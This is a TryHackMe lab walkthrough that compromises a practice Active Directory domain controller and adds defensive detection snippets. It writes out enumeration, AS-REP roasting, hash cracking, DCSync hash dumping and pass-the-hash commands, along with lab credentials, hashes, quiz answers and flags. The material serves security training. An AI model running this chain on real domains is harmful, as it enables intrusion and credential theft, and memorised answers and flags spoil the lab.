Attacktive Directory TryHackMe Lab HACKING ACTIVE DIRECTORY

Exploiting a vulnerable Domain Controller.

Steps

1. Connect to the VM: sudo openvpn lglen001.ovpn
2. In the enumeration tab we will run a basic nmap scan: nmap [target IP]
3. I can assume it is running Active Directory by seeing that Kerberos, NetBIOS and LDAP are running: port 389 LDAP, 88 Kerberos, 139 NetBIOS.
4. If we want to see the service versions on the machine we will run nmap [target ip] -sV
5. After this we get the third answer, .local (TLD is top level domain).
6. Going back to the first question, we can use enum4linux; we can also use msfconsole, even though the answer is enum4linux.
7. I can see from the output that we get THM-AD as the domain.
8. Msfconsole attempt:
9. msfconsole
10. use auxiliary/scanner/smb/smb_version
11. show options
12. set RHOSTS [target ip]
13. run
14. We will then see the domain name.

What tool will allow us to enumerate port 139/445? enum4linux

What is the NetBIOS-Domain Name of the machine? THM-AD

What invalid TLD do people commonly use for their Active Directory Domain? .local

Enumerating users via Kerberos

1. Now enumerate users.
2. Follow the steps to download kerbrute: https://github.com/ropnop/kerbrute/releases
3. After a lot of failure I realized that none of the packages will run in my VM because my host machine is ARM64, not amd64. I suggest using a different tool if needed, but for this lab this tool is necessary. I used linwinpwn with the RID brute force option.
4. Follow the steps in another environment or their AttackBox.
5. cd into the kerbrute directory.
6. ./kerbrute_linux_amd64 userenum -d spookysec.local --dc [target machine domain controller] users.txt
7. Answer the TryHackMe questions:

What command within Kerbrute will allow us to enumerate valid usernames? userenum

What notable account is discovered? (These should jump out at you) svc-admin

What is the other notable account discovered? (These should jump out at you) backup

Exploiting Active Directory

1. I will use Impacket for this section, specifically GetNPUsers.py. The tool is in /opt/impacket/examples/, so cd /opt/impacket/examples/
2. python3 GetNPUsers.py to get the help output.
3. python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.115.28 : we run this command with our domain name, the svc-admin user, no password, and the domain controller's IP.
4. This command produces the AS-REP (TGT response) output for svc-admin, which is the hash value.
5. Now crack the hash: cd to the Desktop directory, nano hash.txt and place the hash in that file. We will use john to crack it.
6. john hash.txt --wordlist=passwords.txt
7. The password we recovered for svc-admin is management2005.
8. Answer the questions:

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) Kerberos 5 AS-REP etype 23

What mode is the hash? 18200

Now crack the hash with the modified password list provided, what is the user account's password? management2005
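As an added defensive example (not part of the original write-up, nor code from kerbrute or Impacket), the following Python checks constructed Windows Security Event ID 4768 records for the two activities in this section: the kerbrute userenum sweep, which appears as a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN failures from one source, and the GetNPUsers.py request, which appears as a TGT issued with pre-authentication type 0 and RC4 (etype 23). The IP addresses and most usernames are assumptions.

```python
# Added example, not code from the TryHackMe lab or from kerbrute/Impacket:
# a detector over constructed Windows Security log records (Event ID 4768,
# "A Kerberos authentication ticket (TGT) was requested") for the two
# activities performed above: username enumeration and AS-REP roasting.
# Field names follow the 4768 event; every record below is constructed.
from collections import Counter

STATUS_SUCCESS = "0x0"
STATUS_UNKNOWN_PRINCIPAL = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN: account does not exist
PREAUTH_NONE = "0"                 # TGT issued without pre-authentication
ETYPE_RC4_HMAC = "0x17"            # etype 23, the "Kerberos 5 AS-REP etype 23" hash above

SAMPLE_4768 = [  # constructed records; IPs and most usernames are made up
    {"TargetUserName": "jdoe", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "asmith", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "helpdesk", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "printer", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "svc-admin", "IpAddress": "10.10.14.5", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "backup", "IpAddress": "10.10.10.20", "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"TargetUserName": "bakcup", "IpAddress": "10.10.10.20", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
]

def enumeration_sources(events, threshold=3):
    """Source IPs with at least `threshold` TGT requests for non-existent accounts.
    A single typo (10.10.10.20 above) stays below the threshold; a wordlist sweep does not."""
    failures = Counter(e["IpAddress"] for e in events
                       if e.get("Status") == STATUS_UNKNOWN_PRINCIPAL)
    return sorted(ip for ip, n in failures.items() if n >= threshold)

def asrep_roast_candidates(events):
    """(user, ip) pairs where a TGT was issued with no pre-auth and RC4 encryption:
    exactly the conditions under which an offline-crackable AS-REP is handed out."""
    return sorted({(e["TargetUserName"], e["IpAddress"]) for e in events
                   if e.get("Status") == STATUS_SUCCESS
                   and e.get("PreAuthType") == PREAUTH_NONE
                   and e.get("TicketEncryptionType") == ETYPE_RC4_HMAC})

if __name__ == "__main__":
    print("enumeration sources:", enumeration_sources(SAMPLE_4768))
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_4768))
```

Every account the second check reports is one where "Do not require Kerberos preauthentication" is set; clearing that flag on svc-admin (and preferring AES ticket encryption) removes the condition the hash above depends on.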

Enumerating shares

1. We can use smbclient for SMB enumeration; we will run this command:
2. sudo smbclient -U spookysec.local/svc-admin -L //10.10.115.28
3. We will enter the password we recovered for svc-admin, management2005.
4. Then we will receive all shares in the environment.
5. Of those 6 shares we want to see what is in the backup share, the only one we can get into, so we connect to it with smbclient.
6. We will get the smbclient directory prompt.
7. Use the pwd command to see the current directory.
8. ls
9. Then get backup_credentials.txt
10. nano backup_credentials.txt
11. The content of the file is YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw, which is base64.
12. Go online and use a base64 decoder (or decode locally with base64 -d, so the credentials are not pasted into a third-party website).
13. Decoded output: backup@spookysec.local:backup2517860
14. Answer the questions:

What utility can we use to map remote SMB shares? smbclient

Which option will list shares? -L

How many remote shares is the server listing? 6

There is one particular share that we have access to that contains a text file. Which share is it? backup

What is the content of the file? YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents? backup@spookysec.local:backup2517860

Elevating privileges in the domain

With the backup user account I now have more privileges than before. As the backup account for the Domain Controller, it holds a permission that regular users lack: it can replicate all Active Directory changes, including password hashes, to my user account.

Given this, I can use secretsdump.py from Impacket. It extracts all the password hashes that this account is able to sync from the domain controller, and with those I effectively gain complete control over the AD domain.

1. The tool is in /opt/impacket/examples/, so cd /opt/impacket/examples/
2. sudo secretsdump.py to see the help output.
3. sudo secretsdump.py -dc-ip 10.10.171.96 spookysec.local/backup:backup2517860@10.10.171.96
4. This command gets us the hashes of all of the accounts in this Active Directory. We are interested in the Administrator's NTLM hash, the third string: 0e0363213e37b94221497260b0bcb4fc
5. We go to a fresh terminal and cd /opt/impacket/examples/
6. We will then use evil-winrm, a tool that lets us gain access with the hash instead of the password.
7. The command: sudo evil-winrm -i 10.10.171.96 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
8. If it works I'll get Administrator access and land in the Administrator's directory.
9. From that point we can complete the Attacktive Directory TryHackMe lab.

10. Answer the questions:

What method allowed us to dump NTDS.DIT? DRSUAPI

What is the Administrator's NTLM hash? 0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password? Pass The Hash

Using a tool called Evil-WinRM what option will allow us to use a hash? -H

11. Flags:

svc-admin: TryHackMe{K3rb3r0s_Pr3_4uth}

Backup: TryHackMe{B4ckM3UpSc0tty!}

Administrator: TryHackMe{4ctiveD1rectoryM4st3r}
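As an added defensive example (not part of the write-up, nor code from Impacket), this Python flags the DRSUAPI replication that secretsdump.py performs above as it appears on the domain controller in Windows Security Event ID 4662 records: an account that is not a domain controller exercising the directory replication control access rights. The account names, the MSOL_sync allowlist entry and the event records are constructed.

```python
# Added example, not code from the lab or Impacket: flag DCSync-style
# replication requests in constructed Event ID 4662 ("An operation was
# performed on an object") records, which is how the DRSUAPI dump above
# shows up on the domain controller. The rights GUIDs are Active Directory's
# replication control access rights; accounts and records are made up.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Hypothetical allowlist: a directory-sync service account that legitimately replicates.
APPROVED_REPLICATORS = {"MSOL_sync"}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)

SAMPLE_4662 = [  # constructed; the Properties field mimics the event's raw layout
    {"SubjectUserName": "DC01$", "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc-admin", "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # a non-replication GUID
    {"SubjectUserName": "MSOL_sync", "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def is_expected_replicator(name):
    """Domain controllers (computer accounts end in '$') and approved sync accounts."""
    return name.endswith("$") or name in APPROVED_REPLICATORS

def find_dcsync(events):
    """Return (account, [rights]) for non-DC principals exercising replication rights."""
    hits = []
    for e in events:
        guids = {g.lower() for g in GUID_RE.findall(e.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
        if rights and not is_expected_replicator(e["SubjectUserName"]):
            hits.append((e["SubjectUserName"], rights))
    return hits

if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_4662):
        print(f"replication by non-DC account {account}: {', '.join(rights)}")
```

The same rights are the thing to audit on the domain object's ACL: any principal other than the domain controllers and a known sync account holding Get-Changes-All is the misconfiguration this section exploits.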

Lessons Learned

During the Attacktive Directory TryHackMe engagement, several important lessons were learned.

Firstly, it is crucial to establish a secure connection to the virtual machine by following the provided instructions, such as using the appropriate OpenVPN configuration file.

Secondly, meticulously following the step-by-step guidelines and instructions provided in the lab or resource is paramount for success. Enumeration plays a vital role in penetration testing, and tools like Nmap should be used to identify the services running on the target machine. Paying attention to port numbers and associated services, such as LDAP, Kerberos, and NetBIOS running on ports 389, 88, and 139 respectively, can indicate the presence of Active Directory.

Enumeration tools like enum4linux and Metasploit's msfconsole are helpful for gathering information and performing reconnaissance. Understanding the target system's architecture is important, as some tools may not be compatible, and verifying compatibility between ARM64 and amd64 is crucial.

Exploiting Active Directory often involves extracting user account information, such as usernames and password hashes. Impacket, a powerful Python library, provides various tools for interacting with Active Directory, including GetNPUsers.py for retrieving AS-REP hashes and secretsdump.py for dumping NTDS.DIT. Hash cracking tools like John the Ripper can be employed to recover plaintext passwords from the hashes.

Smbclient proves valuable for SMB enumeration, listing shares, and accessing files within those shares. It is essential to decode any encoded content, such as base64-encoded files, using available decoding tools (preferably local ones, so recovered credentials are not pasted into a third-party website).

Privilege escalation is possible by leveraging higher privileged user accounts, such as the backup account, which may provide access to additional resources and sensitive information. Tools like secretsdump.py from Impacket can be used to retrieve password hashes synced from the domain controller.

Evil-WinRM, a remote Windows command execution tool, can use the obtained NTLM hash (pass-the-hash) to gain unauthorized access to the target machine. Proper documentation of discovered credentials and associated user accounts is essential for progress throughout the engagement.

These lessons provide valuable insights for conducting penetration testing and highlight the importance of following ethical guidelines and obtaining legal authorization for security testing activities.